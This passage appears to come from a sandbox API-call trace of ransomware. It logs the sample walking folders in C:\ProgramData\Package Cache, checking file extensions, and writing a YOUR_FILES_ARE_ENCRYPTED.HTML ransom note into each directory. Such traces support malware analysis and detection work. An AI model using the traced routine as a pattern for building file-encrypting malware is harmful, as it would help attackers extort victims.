param_1=0x4ebd796, param_2="%02X" | out: param_1="70") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd79a, param_2="%02X" | out: param_1="85") returned 2 [0158.091] wsprintfW (in: 
param_1=0x4ebd79e, param_2="%02X" | out: param_1="83") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd7a2, param_2="%02X" | out: param_1="15") returned 2 [0158.091] wsprintfW (in: param_1=0x4ebd7a6, param_2="%02X" | out: param_1="3D") returned 2 [0158.092] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\cab1.cab" [0158.092] CreateIoCompletionPort (FileHandle=0x4a8, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0158.092] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0158.092] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec849b00, ftCreationTime.dwHighDateTime=0x1d5c5ba, ftLastAccessTime.dwLowDateTime=0xec849b00, ftLastAccessTime.dwHighDateTime=0x1d5c5ba, ftLastWriteTime.dwLowDateTime=0xec849b00, ftLastWriteTime.dwHighDateTime=0x1d5c5ba, nFileSizeHigh=0x0, nFileSizeLow=0x2f000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 1 [0158.092] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi") returned 139 [0158.092] lstrcmpW (lpString1="vc_runtimeMinimum_x86.msi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.092] PathFindExtensionW 
(pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0158.092] lstrlenW (lpString=".msi") returned 4 [0158.092] PathFindExtensionW (pszPath="vc_runtimeMinimum_x86.msi") returned=".msi" [0158.092] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec849b00, ftCreationTime.dwHighDateTime=0x1d5c5ba, ftLastAccessTime.dwLowDateTime=0xec849b00, ftLastAccessTime.dwHighDateTime=0x1d5c5ba, ftLastWriteTime.dwLowDateTime=0xec849b00, ftLastWriteTime.dwHighDateTime=0x1d5c5ba, nFileSizeHigh=0x0, nFileSizeLow=0x2f000, dwReserved0=0x0, dwReserved1=0x60, cFileName="vc_runtimeMinimum_x86.msi", cAlternateFileName="VC_RUN~1.MSI")) returned 0 [0158.093] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0158.093] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 143 [0158.093] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\vcRuntimeMinimum_x86\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{2bc3bd4d-faba-4394-93c7-9ac82a263fe2}v14.25.28508\\packages\\vcruntimeminimum_x86\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0158.185] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0158.188] CloseHandle (hObject=0x4a8) returned 1 [0158.188] GetProcessHeap () returned 0x270000 [0158.189] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 
| out: hHeap=0x270000) returned 1 [0158.196] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35ba5cf0, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35ba5cf0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0158.196] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0158.196] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0158.197] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{2bc3bd4d-faba-4394-93c7-9ac82a263fe2}v14.25.28508\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0158.197] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebde20, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebde20*=0x3c00, lpOverlapped=0x0) returned 1 [0158.200] CloseHandle (hObject=0x598) returned 1 [0158.200] GetProcessHeap () returned 0x270000 [0158.201] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0158.202] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x35b7fb90, 
ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x35b7fb90, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x35b7fb90, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 0 [0158.202] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0158.202] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0158.202] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{2bc3bd4d-faba-4394-93c7-9ac82a263fe2}v14.25.28508\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0158.203] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0158.205] CloseHandle (hObject=0x58c) returned 1 [0158.211] GetProcessHeap () returned 0x270000 [0158.212] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0158.213] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf974b9d0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf974b9d0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, 
cFileName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", cAlternateFileName="{33D1F~1")) returned 1 [0158.213] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned 71 [0158.213] GetProcessHeap () returned 0x270000 [0158.213] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0158.213] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" [0158.213] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*" [0158.213] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf974b9d0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf974b9d0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0158.214] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf974b9d0, ftLastAccessTime.dwHighDateTime=0x1d706a5, 
ftLastWriteTime.dwLowDateTime=0xf974b9d0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.214] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf974b9d0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf974b9d0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xfc4f7ff0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x28a, dwReserved0=0x0, dwReserved1=0x60, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0158.214] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned 81 [0158.214] lstrcmpW (lpString1="state.rsm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.214] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0158.214] lstrlenW (lpString=".rsm") returned 4 [0158.214] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0158.214] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf96ff710, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xbe37ee50, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x6f428, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0158.214] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe") returned 88 [0158.214] lstrcmpW (lpString1="vcredist_x86.exe", 
lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.214] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0158.214] lstrlenW (lpString=".exe") returned 4 [0158.214] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0158.214] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf96ff710, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf96ff710, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xbe37ee50, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x6f428, dwReserved0=0x0, dwReserved1=0x60, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0 [0158.215] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0158.215] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0158.215] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0158.218] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0158.221] CloseHandle (hObject=0x58c) returned 1 [0158.221] GetProcessHeap () returned 0x270000 [0158.222] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0158.222] FindNextFileW (in: 
hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x359b6b10, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x359dcc70, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x359dcc70, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{65e650ff-30be-469d-b63a-418d71ea1765}", cAlternateFileName="{65E65~1")) returned 1 [0158.222] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}") returned 71 [0158.222] GetProcessHeap () returned 0x270000 [0158.222] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0158.223] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}" [0158.223] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\*" [0158.223] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x359b6b10, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x359dcc70, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x359dcc70, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, 
dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0158.223] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x359b6b10, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x359dcc70, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x359dcc70, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.223] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359dcc70, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x359dcc70, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x3d0955b0, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x340, dwReserved0=0x0, dwReserved1=0x60, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0158.223] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\state.rsm") returned 81 [0158.223] lstrcmpW (lpString1="state.rsm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.223] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0158.223] lstrlenW (lpString=".rsm") returned 4 [0158.224] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0158.224] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x359b6b10, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x359b6b10, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x2e940a70, ftLastWriteTime.dwHighDateTime=0x1d706a7, 
nFileSizeHigh=0x0, nFileSizeLow=0x9e2e8, dwReserved0=0x0, dwReserved1=0x60, cFileName="VC_redist.x86.exe", cAlternateFileName="VC_RED~1.EXE")) returned 1 [0158.224] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\VC_redist.x86.exe") returned 89 [0158.224] lstrcmpW (lpString1="VC_redist.x86.exe", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0158.224] PathFindExtensionW (pszPath="VC_redist.x86.exe") returned=".exe" [0158.224] lstrlenW (lpString=".exe") returned 4 [0158.224] PathFindExtensionW (pszPath="VC_redist.x86.exe") returned=".exe" [0158.224] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x359b6b10, ftCreationTime.dwHighDateTime=0x1d706a7, ftLastAccessTime.dwLowDateTime=0x359b6b10, ftLastAccessTime.dwHighDateTime=0x1d706a7, ftLastWriteTime.dwLowDateTime=0x2e940a70, ftLastWriteTime.dwHighDateTime=0x1d706a7, nFileSizeHigh=0x0, nFileSizeLow=0x9e2e8, dwReserved0=0x0, dwReserved1=0x60, cFileName="VC_redist.x86.exe", cAlternateFileName="VC_RED~1.EXE")) returned 0 [0158.224] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0158.224] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0158.224] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{65e650ff-30be-469d-b63a-418d71ea1765}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0158.228] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, 
nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0158.230] CloseHandle (hObject=0x58c) returned 1 [0158.231] GetProcessHeap () returned 0x270000 [0158.232] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0158.232] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf99acfd0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf99acfd0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", cAlternateFileName="{B1755~1.610")) returned 1 [0158.232] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned 82 [0158.232] GetProcessHeap () returned 0x270000 [0158.232] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0158.232] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030" [0158.232] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*" 
[0158.233] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf99acfd0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf99acfd0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0158.233] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9986e70, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf99acfd0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf99acfd0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0158.233] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99acfd0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0xf99acfd0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0xf99acfd0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="packages", cAlternateFileName="")) returned 1 [0158.233] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned 91 [0158.233] GetProcessHeap () returned 0x270000 [0158.233] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0158.233] lstrcpyW (in: 
